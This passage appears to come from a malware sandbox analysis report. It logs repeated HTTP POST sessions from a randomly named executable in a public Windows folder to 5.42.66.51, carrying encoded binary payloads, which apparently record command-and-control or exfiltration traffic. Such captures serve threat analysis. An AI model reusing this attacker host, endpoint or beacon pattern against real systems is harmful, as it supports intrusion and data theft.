                                                                                                Data Ascii: YZF[_YUTTW[TR_WSXSX][]UV_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX-3')V=& %<5"'[,#>= ",=*<Y:+"_$,P,'
                                                                                                Oct 11, 2024 20:38:26.455749989 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:26.599823952 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:26 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                35192.168.2.5500205.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:26.894817114 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:27.248275042 CEST2552OUTData Raw: 59 5b 43 59 5f 5b 55 55 54 57 5b 54 52 57 57 55 58 52 58 58 5b 55 55 57 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y[CY_[UUTW[TRWWUXRXX[UUW_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.E39>(")6$_3!5#,0$X*8#^!9%=$\.+"_$,P,
                                                                                                Oct 11, 2024 20:38:27.572762966 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:27.703151941 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:27 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                36192.168.2.5500215.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:27.398423910 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:27.755017042 CEST2156OUTData Raw: 59 5c 46 5c 5f 52 50 58 54 57 5b 54 52 5c 57 5d 58 53 58 5f 5b 5b 55 5e 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y\F\_RPXTW[TR\W]XSX_[[U^_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.$<X);&)Z$-5;[; $\*)#^)Q:>?19"_$,P,+
                                                                                                Oct 11, 2024 20:38:28.083930969 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:28.212970972 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:27 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 39 1e 21 11 0e 07 2a 55 3d 1c 2c 3a 32 0f 26 32 0c 17 31 3b 3f 19 21 04 30 1f 2e 10 0d 50 24 29 3c 02 29 3c 31 0e 25 3c 2b 5a 25 2b 2b 5d 0d 10 26 5f 27 23 22 5e 3d 16 2c 57 3a 07 31 07 24 58 26 5b 21 2e 2b 55 21 10 04 06 32 3c 20 1a 32 3e 2e 0e 3c 1a 29 59 2c 2c 2b 5d 31 04 2f 55 0f 11 38 55 32 01 1d 02 23 2e 20 0b 34 06 3f 07 20 3c 32 5b 37 23 34 03 31 04 23 5c 32 3c 2e 59 2a 33 01 55 2a 1c 3a 00 27 3a 3a 08 28 18 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 989!*U=,:2&21;?!0.P$)<)<1%<+Z%++]&_'#"^=,W:1$X&[!.+U!2< 2>.<)Y,,+]1/U8U2#. 4? <2[7#41#\2<.Y*3U*:'::("S."S2WM0
                                                                                                Oct 11, 2024 20:38:28.229811907 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:28.443336964 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:28.443582058 CEST2552OUTData Raw: 59 58 43 5b 5f 58 55 5a 54 57 5b 54 52 58 57 51 58 51 58 5a 5b 5b 55 56 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: YXC[_XUZTW[TRXWQXQXZ[[UV_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.$7)!>&X'1#%,30(+%W48)Q9-%[*!\:+"_$,P,;
                                                                                                Oct 11, 2024 20:38:28.775456905 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:28 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                37192.168.2.5500225.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:28.947490931 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:29.295125008 CEST2552OUTData Raw: 5c 5e 43 5d 5f 5a 55 5e 54 57 5b 54 52 59 57 5d 58 56 58 5b 5b 5c 55 5e 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \^C]_ZU^TW[TRYW]XVX[[\U^_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.D00Z>;1)54Y3*\"+X. ;>" ()V:%_=?.;"_$,P,
                                                                                                Oct 11, 2024 20:38:29.631477118 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:29.759079933 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:29 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                38192.168.2.5500235.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:29.236041069 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:29.591950893 CEST2156OUTData Raw: 5c 5e 46 5b 5a 5e 55 5d 54 57 5b 54 52 59 57 5d 58 56 58 5f 5b 5b 55 5a 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \^F[Z^U]TW[TRYW]XVX_[[UZ_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.%93*Q= ^3?5!%Y8U#((*4.:5_=$]-"_$,P,
                                                                                                Oct 11, 2024 20:38:29.938611984 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:30.071259022 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:29 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 39 58 21 2c 23 16 29 30 2d 1d 2e 39 36 0c 24 32 03 07 26 16 23 16 23 3a 3f 00 2e 00 3c 0c 31 04 3f 11 2a 5a 25 0b 24 2f 01 12 30 2b 2b 5d 0d 10 25 07 24 20 26 5b 2a 28 3c 57 2e 2e 08 5a 33 07 22 5d 21 2e 20 08 23 2d 39 5c 26 12 2b 0f 25 3e 31 1f 28 1a 2e 03 3b 3f 30 06 26 04 2f 55 0f 11 38 1c 26 06 27 06 21 2e 24 0c 23 01 3f 01 23 3c 31 01 22 30 34 02 31 2a 09 5b 32 3c 0c 5a 2a 55 27 1d 3d 22 3d 1a 32 2a 29 12 2b 08 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 989X!,#)0-.96$2&##:?.<1?*Z%$/0++]%$ &[*(<W..Z3"]!. #-9\&+%>1(.;?0&/U8&'!.$#?#<1"041*[2<Z*U'="=2*)+"S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                39192.168.2.5500245.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:29.945889950 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:30.295219898 CEST2552OUTData Raw: 59 53 43 5e 5f 5f 55 5a 54 57 5b 54 52 56 57 55 58 51 58 5b 5b 55 55 58 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: YSC^__UZTW[TRVWUXQX[[UUX_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.D$) ]>&*%<:!. +>8=U#!R,-^*#:;"_$,P,
                                                                                                Oct 11, 2024 20:38:30.690289974 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:30.825090885 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:30 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                40192.168.2.5500255.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:31.011518955 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                41192.168.2.5500265.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:31.086966991 CEST382OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Oct 11, 2024 20:38:31.439220905 CEST2156OUTData Raw: 5c 5a 43 58 5f 5c 55 55 54 57 5b 54 52 56 57 50 58 55 58 5c 5b 59 55 5c 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \ZCX_\UUTW[TRVWPXUX\[YU\_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX-3(\>>&X$%65/X).7!S:!^)1<X-+"_$,P,
                                                                                                Oct 11, 2024 20:38:31.776782990 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:31.903361082 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:31 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 39 11 23 3f 37 16 3e 30 2e 0f 3b 2a 25 57 31 32 3a 5d 31 38 37 16 21 5c 38 5d 3a 3e 01 54 25 04 0d 58 3e 2c 08 1d 25 3c 3c 00 25 3b 2b 5d 0d 10 25 07 26 33 22 59 29 16 0e 57 3a 10 21 06 30 2d 3a 5a 22 2d 3c 0d 35 00 3e 05 31 2f 2f 0b 25 13 31 55 3f 42 3d 5d 2d 2c 0a 07 31 3e 2f 55 0f 11 3b 0a 26 11 3f 03 36 3d 28 0c 34 11 2c 1b 20 2c 3e 58 20 33 23 5c 31 39 27 12 26 5a 3d 07 29 33 01 1f 29 32 26 04 25 29 3a 0d 2b 22 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 989#?7>0.;*%W12:]187!\8]:>T%X>,%<<%;+]%&3"Y)W:!0-:Z"-<5>1//%1U?B=]-,1>/U;&?6=(4, ,>X 3#\19'&Z=)3)2&%):+""S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                42192.168.2.5500275.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:31.229310036 CEST382OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Oct 11, 2024 20:38:31.578094006 CEST2552OUTData Raw: 5c 59 46 5a 5f 52 50 5a 54 57 5b 54 52 56 57 52 58 54 58 5a 5b 59 55 57 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \YFZ_RPZTW[TRVWRXTXZ[YUW_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX-'_4>:>&%/2["$. 7*^&78P.*7-"_$,P,
                                                                                                Oct 11, 2024 20:38:31.941895962 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:32.059052944 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:31 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                43192.168.2.5500285.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:32.240073919 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:32.592092991 CEST2552OUTData Raw: 59 5e 46 5a 5a 5e 55 5c 54 57 5b 54 52 58 57 56 58 52 58 5a 5b 5f 55 5b 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y^FZZ^U\TW[TRXWVXRXZ[_U[_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX-'*(!>6/'95?Y;#(\*(78-=)\."_$,P,;
                                                                                                Oct 11, 2024 20:38:32.951159954 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:33.083218098 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:32 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                44192.168.2.5500295.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:32.921540976 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2140
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:33.279489994 CEST2140OUTData Raw: 5c 59 46 5c 5f 5d 55 55 54 57 5b 54 52 5e 57 5d 58 51 58 5d 5b 5e 55 5e 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \YF\_]UUTW[TR^W]XQX][^U^_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX-%: ]?+2U)_$!",8;=>#8&-[)X=19"_$,P,
                                                                                                Oct 11, 2024 20:38:33.617772102 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:33.755724907 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:33 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 3a 03 36 2c 33 5c 28 23 39 1c 2e 2a 31 1e 26 22 26 17 31 06 33 5c 22 5c 3c 59 2e 2d 23 1f 31 2a 2c 04 2a 2c 04 53 24 11 01 13 24 2b 2b 5d 0d 10 26 5e 24 30 3e 5a 2a 06 0d 0e 2e 58 2a 10 24 10 3d 02 22 00 0d 50 36 3e 22 04 32 12 2c 1a 25 3e 3a 0d 29 37 39 5d 2c 2c 38 05 31 3e 2f 55 0f 11 38 55 31 06 20 11 22 04 20 0d 20 01 2c 1b 23 2c 22 5e 20 55 37 5b 24 3a 01 59 31 3c 22 59 29 1d 02 0a 28 21 36 00 25 29 39 56 3c 08 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 98:6,3\(#9.*1&"&13\"\<Y.-#1*,*,S$$++]&^$0>Z*.X*$="P6>"2,%>:)79],,81>/U8U1 " ,#,"^ U7[$:Y1<"Y)(!6%)9V<"S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                45192.168.2.5500305.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:33.230432034 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2548
                                                                                                Expect: 100-continue
